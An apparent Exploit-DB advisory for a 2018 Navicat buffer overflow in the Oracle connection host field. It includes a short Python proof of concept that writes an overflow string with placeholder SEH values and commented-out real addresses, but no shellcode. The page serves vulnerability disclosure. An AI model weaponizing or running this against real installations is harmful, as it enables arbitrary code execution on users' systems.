Navicat < 12.0.27 Oracle Connection Overflow

vendor:

Navicat

by:

Kevin McGuigan

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Navicat

Affected Version From: 12.0.26

Affected Version To: 12.0.27

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 32-bit

2018

Navicat < 12.0.27 Oracle Connection Overflow

Navicat is vulnerable to a buffer overflow when a user creates a new Oracle connection and pastes a specially crafted string into the host field. This can be exploited to execute arbitrary code by an attacker.

Mitigation:

Upgrade to the latest version of Navicat (12.0.27) to patch the vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 27/04/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.


# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow. 
filename="navicatPOC.txt"
junk = "A" * 1502
#nseh = "\x4C\x4C\x77\x04"
#seh= "\x75\x2a\x01\x10"
nseh = "B" * 4
seh = "C" * 4
fill = "D" * 4000
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()